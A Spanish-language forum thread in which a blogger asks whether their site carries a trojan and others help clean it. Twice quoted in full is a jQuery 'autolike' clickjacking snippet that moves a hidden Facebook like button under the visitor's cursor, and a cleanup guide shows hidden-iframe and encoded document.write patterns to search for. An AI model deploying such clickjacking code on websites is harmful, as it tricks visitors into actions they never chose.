Mi blog tiene un troyano?

Estado
No está abierto para más respuestas.
Mma

Mma

Cobre
Usuario de Bronce
Mensajes
866
Puntuación de reacción
3
alejandrocacheiro dijo:
Si como dice julio es el autolike, lo más seguro es porque tengas el nuevo ese que se publicó en el foro, ese también me dio problemas a mi con avast
Click para expandir ...

Tenía uno antiguo y ayer quité el código ...
Voy a mirar de nuevo a ver si hay otro ...

- - - Actualización- - -

Julio Rodríguez dijo:
no lo has quitado, ahora me salio
Click para expandir ...

¿Este es el código que tengo que quitar no?

HTML: 
<iframe src="http://www.facebook.com/plugins/like.php?href=https://www.facebook.com/condonesmix&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

	</div> 

	<script type="text/javascript"> 

		jQuery( document ).ready( function() {

			 jQuery( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {



				jQuery( "#clickjack-button-wrapper-5" ).css( {

					top: e.pageY - 10,

					left: e.pageX + 50

				} );

			} );



                        clickjack_hider();

                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);

		} );

                        function clickjack_hider(){

			jQuery("input").mouseout(function(){ClickJackFbShow();});

			jQuery("a").mouseout(function(){ClickJackFbShow();});

			jQuery("button").mouseout(function(){ClickJackFbShow();});

			jQuery("textarea").mouseout(function(){ClickJackFbShow();});

			jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});			jQuery("object").mouseout(function(){ClickJackFbShow();});



			jQuery("input").mouseover(function(){ClickJackFbHide();});

			jQuery("a").mouseover(function(){ClickJackFbHide();});

			jQuery("button").mouseover(function(){ClickJackFbHide();});

			jQuery("textarea").mouseover(function(){ClickJackFbHide();});

			jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});			jQuery("object").mouseover(function(){ClickJackFbHide();});

                        }

	</script>

- - - Actualización- - -

¿Ahora sale?
He quitado esto:

<iframe src="http://www.facebook.com/plugins/like.php?href=https://www.facebook.com/condonesmix&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
 
Mma

Mma

Cobre
Usuario de Bronce
Mensajes
866
Puntuación de reacción
3
@Julio Rodríguez me dice el de OMDream que le sigue saliendo lo del troyano ...
 
alejandrocacheiro

alejandrocacheiro

Diamante
Usuario de Bronce
Mensajes
3,814
Puntuación de reacción
1
Quita el resto no quites solo eso, el autolike es todo, quita todo eso de clickjack, eso pertenece al autolike

Mma dijo:
Tenía uno antiguo y ayer quité el código ...
Voy a mirar de nuevo a ver si hay otro ...

- - - Actualización- - -



¿Este es el código que tengo que quitar no?

HTML: 
<iframe src="http://www.facebook.com/plugins/like.php?href=https://www.facebook.com/condonesmix&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

	</div> 

	<script type="text/javascript"> 

		jQuery( document ).ready( function() {

			 jQuery( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {



				jQuery( "#clickjack-button-wrapper-5" ).css( {

					top: e.pageY - 10,

					left: e.pageX + 50

				} );

			} );



                        clickjack_hider();

                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);

		} );

                        function clickjack_hider(){

			jQuery("input").mouseout(function(){ClickJackFbShow();});

			jQuery("a").mouseout(function(){ClickJackFbShow();});

			jQuery("button").mouseout(function(){ClickJackFbShow();});

			jQuery("textarea").mouseout(function(){ClickJackFbShow();});

			jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});			jQuery("object").mouseout(function(){ClickJackFbShow();});



			jQuery("input").mouseover(function(){ClickJackFbHide();});

			jQuery("a").mouseover(function(){ClickJackFbHide();});

			jQuery("button").mouseover(function(){ClickJackFbHide();});

			jQuery("textarea").mouseover(function(){ClickJackFbHide();});

			jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});			jQuery("object").mouseover(function(){ClickJackFbHide();});

                        }

	</script>

- - - Actualización- - -

¿Ahora sale?
He quitado esto:

<iframe src="http://www.facebook.com/plugins/like.php?href=https://www.facebook.com/condonesmix&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
Click para expandir ...
 
N

nono32

Hierro
Mensajes
403
Puntuación de reacción
0
Algunos hosting aplican una solución para sus clientes con planes bajo plataforma Linux. En otros casos, por lo general, la voz de alerta llega por parte de Google, que agrega el dominio a la lista de sitios “sospechosos” de alojar malware, y evita el acceso al sitio colocando una pantalla de alerta.
Es una medida para evitar que la infección que tiene el sitio se expanda a las PCs o los navegadores de quienes, de otra manera, visitarían la web sin saber que automáticamente estarían descargando un virus a su equipo.
¿Cómo entró el virus?
A diferencia de lo que indicaría el sentido común (“si mi sitio tiene un virus, está infectado el servidor web de mi proveedor de hosting”), el problema casi siempre está/estuvo en la PC desde donde se actualiza el sitio web. O código de publicidad que conllevan a un virus
Quienes se dedican a subir este tipo de virus, con la intención de expandirlos a través de internet, apuntan a robar una información fundamental: sus claves FTP.
Con esas claves, suben archivos infectados o sus páginas modificadas, sin que Ud. se dé cuenta. Es más, si el ataque es lo suficientemente elaborado, hasta conseguirán al instante su nueva clave de FTP en el momento que la modifique.
Otra manera muy común de agregar un virus o código malicioso a un sitio es explotando la vulnerabilidad de una aplicación desactualizada (foro, blog, galería de fotos, carrito de compras, etc.). Por eso es fundamental tener siempre la aplicación actualizada y aplicar los parches de seguridad recomendados por sus desarrolladores.
¿Cómo encuentro el virus?
La forma más usada para esconder un virus en un sitio web se conoce como “iframe attack”.
El “iframe” se esconde en el código de sus páginas, y lo que hace es llamar a otra página de forma invisible (es decir, ni Ud. ni quien visite su web lo notan), buscando posicionar mejor esa página escondida o bien infectar con virus o código malicioso a los visitantes.
Lo más común es que lo agreguen al código de su página index (index.html, index.php, etc.). También ocurre, con virus como Gumblar cn, que suban un archivo y lo ubiquen en una carpeta donde sea difícil detectarlo (Gumblar cn, por ejemplo, sube un archivo llamado “image.php” dentro de la carpeta “images”).
¿Cómo elimino el virus?
Paso 1:
Ingresar por FTP y descargar todo el contenido del sitio a una carpeta dentro de su equipo. Inmediatamente después, cambiar la contraseña del FTP desde su Panel de Control.
Paso 2:
Correr un buen antivirus y antispyware en la carpeta que contiene la web, y en el resto del equipo (incluyendo discos extraíbles).
Paso 3:
Una vez que el antivirus haya eliminado archivos sospechosos, comienza el trabajo manual dentro de la carpeta donde está su web.
Con un programa que permita buscar dentro de los archivos, habrá que identificar todos aquellos que incluyan un “iframe” con estilo escondido (“hidden”), que no correspondan a su página, y eliminar esa porción de código.
Ejemplo:
<iframe src=”http://alguna_página.cat”
style=”visibility: hidden; display: none”>
</iframe>
Siguiendo el mismo procedimiento, buscar también si en alguna página existe un“document.write”, seguido de una línea encodeada.
Ejemplo:
<script language=”javascript”>
document.write( unescape( ‘%70%61%67%65%20%6F%6E%65′ ) );
</script>
De existir, borrar esa porción de código.
[FONT=Arial, Helvetica, sans-serif]Asegúrese que todos los src= y http:// hagan referencia a archivos de su sitio web o a sitios externos que Ud. conoce y son confiables.[/FONT]
[FONT=Arial, Helvetica, sans-serif]También que sean a sitios web confiables OJO: no es lo mismo foro20.com que foro-20.com[/FONT]
Luego, sólo resta la revisión manual: buscar entre todos los archivos la existencia de cualquier .php, .js, .htm, .html, asp, .aspx, .inc, .cfm, etc., que no pertenezca a su sitio web.
Paso 4:
Una vez hecho esto, ya seguro de que su sitio está limpio, conéctese por FTP en forma segura. Elimine todo el contenido de la carpeta public_html, y suba los archivos que acaba de limpiar.
Paso 5:
Ahora, elimine el caché de su navegador, abra la página index de su web y todas aquellas que detectó como infectadas en la primera revisión.
Del menú del browser elija la opción para ver el código fuente de cada página. Si no aparece más el “iframe” que apunta a una web desconocida o el “document.write”, entonces significa que el sitio está limpio.
Paso 6:
Si Google marcó su web como sospechosa, será necesario que solicite una revisión para levantar la página de alerta. Deberá completar el formulario en Google Webmaster Central o StopBadware.o en macafee o donde lo creas más confiable.
Por lo general, si Google no encuentra infecciones, en un día ya saca el sitio de su listado de webs sospechosas de alojar malware, aunque en otros sitios aclaran que puede tomar unos días más.

 
NeillHostRed

NeillHostRed

Cobre
Mensajes
222
Puntuación de reacción
0
McFee Antivirus le va a tomar meses sacar su sitio web de ahí si lo ha listado.

Posiblemente tienes alguna vulnerabilidad o en general el servidor de la empresa contratada, mas que nada puede ser el sitio web tuyo que de seguro no esta actualizado o usa librerías, plugin fuera del sitio official del autor o no actualizadas a la fecha. Comienza por actualizar, mantener todo al día y usar plugins, módulos & librerías que estén en los sitios oficiales de los creadores de tales plataforma.

Por ej, nunca uses plugins que no aparezcan en la librería de WordPress.org

Nunca uses plugins que no aparezcan en las librerías de Joomla....

Que muchas veces no son aceptadas por que los autores no son validos o verificados.
 
N

nono32

Hierro
Mensajes
403
Puntuación de reacción
0
NeillHostRed dijo:
McFee Antivirus le va a tomar meses sacar su sitio web de ahí si lo ha listado.

Posiblemente tienes alguna vulnerabilidad o en general el servidor de la empresa contratada, mas que nada puede ser el sitio web tuyo que de seguro no esta actualizado o usa librerías, plugin fuera del sitio official del autor o no actualizadas a la fecha. Comienza por actualizar, mantener todo al día y usar plugins, módulos & librerías que estén en los sitios oficiales de los creadores de tales plataforma.

Por ej, nunca uses plugins que no aparezcan en la librería de WordPress.org

Nunca uses plugins que no aparezcan en las librerías de Joomla....

Que muchas veces no son aceptadas por que los autores no son validos o verificados.
Click para expandir ...

Muy buenos consejos por algo te dedicas al tema de hosting!!! Se me escaparon!!!
 
Mma

Mma

Cobre
Usuario de Bronce
Mensajes
866
Puntuación de reacción
3
Muchas gracias @nono32 @NeillHostRed, lo revisaré
 
Mma

Mma

Cobre
Usuario de Bronce
Mensajes
866
Puntuación de reacción
3
Mi hosting es "EseHost" y tiene un servicio de antivirus, así que lo he analizado y tenía 18 infecciones y ya las he desinfectado.
Gracias a todos por ayudarme.
 
NeillHostRed

NeillHostRed

Cobre
Mensajes
222
Puntuación de reacción
0
Mma dijo:
Mi hosting es "EseHost" y tiene un servicio de antivirus, así que lo he analizado y tenía 18 infecciones y ya las he desinfectado.
Gracias a todos por ayudarme.
Click para expandir ...

No obstante toma en cuenta actualizar todo el wordpress o joomla o el que tengas y todos los complementos y quitar todo complemento que no este en la librería del sitio web oficial de los creadores. También por parte tuya busca complementos de seguridad en la librería de la plataforma oficial, e implementa o sube la seguridad estándar de la misma. También es recomendable analizar a diario o cada 72 horas el sitio web. Estos problemas así Google te los va anotando para evitar tales sitios.
 
Mma

Mma

Cobre
Usuario de Bronce
Mensajes
866
Puntuación de reacción
3
NeillHostRed dijo:
No obstante toma en cuenta actualizar todo el wordpress o joomla o el que tengas y todos los complementos y quitar todo complemento que no este en la librería del sitio web oficial de los creadores. También por parte tuya busca complementos de seguridad en la librería de la plataforma oficial, e implementa o sube la seguridad estándar de la misma. También es recomendable analizar a diario o cada 72 horas el sitio web. Estos problemas así Google te los va anotando para evitar tales sitios.
Click para expandir ...

Muchas gracias por tus recomendaciones, las llevaré a cabo.
Saludos!
 
Estado
No está abierto para más respuestas.

Comparte esta página

Arriba